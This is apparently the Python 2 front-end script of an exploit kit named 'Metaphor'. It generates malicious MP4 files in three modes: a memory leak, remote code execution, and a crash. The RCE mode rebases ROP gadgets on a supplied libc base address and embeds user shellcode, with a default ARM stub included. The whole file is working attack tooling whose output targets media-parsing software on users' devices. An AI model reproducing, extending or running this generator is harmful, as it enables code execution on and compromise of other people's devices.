#!/usr/bin/python2
# -*- coding: utf-8 -*-

import sys
import json
import math
import argparse

from metaphor_leak import *
from metaphor_rce import *
from metaphor_rce_stbl import *
from metaphor_suicide import *

#import gadgets_finder

DEBUG = False

def load_config(path):
    if not path:
        return { }

    #print 'Loading configuration: %s...' % path

    with open(path, 'rb') as f:
        config = json.load(f)

    return config

def main_leak(args):
    if not args.leak_address:
        print >> sys.stderr, 'Error: missing leak address! (-a or --address)'
        return False

    config = MetaphorLeak.DEFAULT_CONFIG
    config.update(load_config(args.config))

    if args.config:
        print 'Loading configuration: %s...' % args.config
        with open(args.config, 'rb') as f:
            new_config = json.load(f)

        config.update(new_config);
    else:
        print 'Using default configuration...'
    
    config['leak_address'] = int(args.leak_address, 16)
    print 'Using leak address 0x%08x' % config['leak_address']

    return MetaphorLeak(config)

# Load shellcode or return simple template
def load_shellcode(filename = None):
    if filename is None:
        return '\x37\xec\xa0\xe3\x1e\xff\x2f\xe1' # bx 0x3700

    with open(filename, 'rb') as f:
        shellcode = f.read()
        
    # Align to 4
    while len(shellcode) % 4 != 0:
        shellcode += '\x00'

    return shellcode

def main_rce(args):
    if args.libc_base is None:
        print >> sys.stderr, 'Error: missing libc base address! (-b or --libc_base)'
        return False
    
    config = MetaphorRce.DEFAULT_CONFIG
    #config = MetaphorRceStbl.DEFAULT_CONFIG
    config.update(load_config(args.config))

    libc_base = int(args.libc_base, 16)

    print 'Reading shellcode: %s...' % args.shellcode
    shellcode = load_shellcode(args.shellcode)

    for gadget in config['gadgets']:
        config['gadgets'][gadget] += libc_base

    return MetaphorRce(config, shellcode, args.thumb, args.param1, args.param2, args.param3)
    # Not fully implemented yet...
    #return MetaphorRceStbl(config, gadgets, shellcode, args.param1, args.param2, args.param3)

def main_suicide(args):
    config = MetaphorSuicide.DEFAULT_CONFIG
    config.update(load_config(args.config))
    return MetaphorSuicide(config)

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-c', '--config', dest='config', help='Override exploit configuration', default=None)
    parser.add_argument('-o', '--output', dest='output', help='Output file path', required=True)

    subparsers = parser.add_subparsers(dest='exploit', help='Type of exploit to generate')

    parser_leak = subparsers.add_parser('leak')
    parser_leak.add_argument('-a', '--leak_address', dest='leak_address', help='Address to leak from', required=True)

    parser_rce = subparsers.add_parser('rce')
    parser_rce.add_argument('-b', '--libc_base', dest='libc_base', help='Base address of libc.so for RCE', required=True)
    parser_rce.add_argument('-s', '--shellcode', dest='shellcode', help='Path to shellcode')
    parser_rce.add_argument('-t', '--thumb', dest='thumb', action='store_true', help='Shellcode is thumb')
    parser_rce.add_argument('-1', '--param1', dest='param1', help='Shellcode parameter #1', type=int, default=0)
    parser_rce.add_argument('-2', '--param2', dest='param2', help='Shellcode parameter #2', type=int, default=0)
    parser_rce.add_argument('-3', '--param3', dest='param3', help='Shellcode parameter #3', type=int, default=0)

    parser_suicide = subparsers.add_parser('suicide')

    args = parser.parse_args()

    metaphor = None

    if args.exploit == 'rce':
        metaphor = main_rce(args)
    elif args.exploit == 'leak':
        metaphor = main_leak(args)
    elif args.exploit == 'suicide':
        metaphor = main_suicide(args)
    else:
        parser.error('Invalid argument: ' + args.exploit)
        exit(-1)

    if not metaphor:
        print 'Failed to create relevant Metaphor builder'
        return False

    data = metaphor.exploit_mp4()
    print 'Dumping %u bytes to %s...' % (len(data), args.output)
    with open(args.output, 'wb') as f:
        f.write(data)

    print 'Done!'

    return True

if __name__ == '__main__':
    main()
